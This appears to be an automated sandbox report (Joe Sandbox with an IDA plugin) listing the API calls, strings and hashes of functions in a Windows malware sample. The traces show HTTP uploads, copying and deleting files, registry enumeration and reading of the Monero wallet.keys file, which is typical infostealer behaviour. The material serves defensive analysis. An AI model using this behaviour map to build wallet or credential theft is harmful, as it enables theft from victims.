LoadLibraryA.KERNEL32(04143018,?,004136C0), ref: 0041611B
LoadLibraryA.KERNEL32(04142E68,?,004136C0), ref: 0041612D
LoadLibraryA.KERNEL32(04142FE8,?,004136C0), ref: 0041613F
LoadLibraryA.KERNEL32(04142E80,?,004136C0), ref: 00416150
GetProcAddress.KERNEL32(75A70000,04142EC8), ref: 00416172
GetProcAddress.KERNEL32(75290000,04143000), ref: 00416193
GetProcAddress.KERNEL32(75290000,04142F58), ref: 004161AB
GetProcAddress.KERNEL32(75BD0000,04142EF8), ref: 004161CD
GetProcAddress.KERNEL32(75450000,041273E0), ref: 004161EE
GetProcAddress.KERNEL32(76E90000,04143350), ref: 0041620F
GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00416226

Strings

NtQueryInformationProcess, xrefs: 0041621A

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404DC0 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

lstrlen.KERNEL32(00000000), ref: 00404E4A

Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
HttpOpenRequestA.WININET(00000000,04143540,?,04148AD8,00000000,00000000,00400100,00000000), ref: 00405058

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04143500,00000000,?,04146830,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
lstrlen.KERNEL32(00000000), ref: 004053FF
GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
RtlAllocateHeap.NTDLL(00000000), ref: 00405417
lstrlen.KERNEL32(00000000), ref: 0040542C
memcpy.MSVCRT ref: 00405443
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
memcpy.MSVCRT ref: 0040546A
lstrlen.KERNEL32(00000000), ref: 0040547C
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
memcpy.MSVCRT ref: 004054A5
lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
InternetCloseHandle.WININET(00000000), ref: 00405565
InternetCloseHandle.WININET(00000000), ref: 00405572
InternetCloseHandle.WININET(00000000), ref: 0040557C

Strings

------, xrefs: 004051AD
", xrefs: 00405136
", xrefs: 00405278
------, xrefs: 004052EF
------, xrefs: 0040506B
--, xrefs: 00404F34
", xrefs: 004053BA
------, xrefs: 00404F4B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocateBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 1133489818-2774362122
Opcode ID: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 9a72f97dd8b00e1372afdc8a2b1b03a2c1d95120a9669ee42c4e7e237aac3cad
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,041434C0), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,041491B0,00000000,?,04146830,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,04143540,?,04148AD8,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

------, xrefs: 00405746
", xrefs: 00405985
------, xrefs: 004059FC
------, xrefs: 004058BB
-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
", xrefs: 00405AC6
-A, xrefs: 00405620, 00405D27, 00405623

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A
API String ID: 148854478-602752961
Opcode ID: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 7227e4c7bb0658229b088806cf99446218fe04dc775902d63d9a1b08b8f75cce
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 9441de83010d804211ba2c91efd87ba17e13f51fe28cc11ac5193f2a5a82d0e2
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: 091ace87055983cba41e323e99ff87893143086efc352c8c0baf1d062dbd0c7d
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,041434C0), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,04143570), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,04143540,?,04148AD8,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

", xrefs: 004049F3
------, xrefs: 0040467D
------, xrefs: 00404929
", xrefs: 004048B2
------, xrefs: 004047E8

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: 274e3f792ec3db14fe8b5dc27bb16b9769716356b3fa8f20fb0828a67ad38914
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,04141C38,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

- , xrefs: 00414D40
?, xrefs: 00414B17
%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: ea198df32fb3f38c870a1feb3a56e4a9a70f91b3b2a48daf6e3f309b18a0f3c8
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,041431B0,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: 47233f5f2a6ac108ed9c2d40d7802ad1b122a578098b672625895cdb083911f5
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04146770,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,041434C0), ref: 00404ED9

Strings

\Monero\wallet.keys, xrefs: 0040134D
wallet_path, xrefs: 004012F0
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
.keys, xrefs: 0040132B

Memory Dump Source

Source File: 00000000.00000002.2175183338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2175183338.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175183338.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_q27UFusYdn.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$ChangeCopyCreateDeleteFindFreeInternetNotificationProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 2054947926-218353709
Opcode ID: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: cc506cc900b1d8de20fb67180724c8fe89b673c0262401868f97255737152c4b
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406FA0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406CA0: memset.MSVCRT ref: 00406CE4
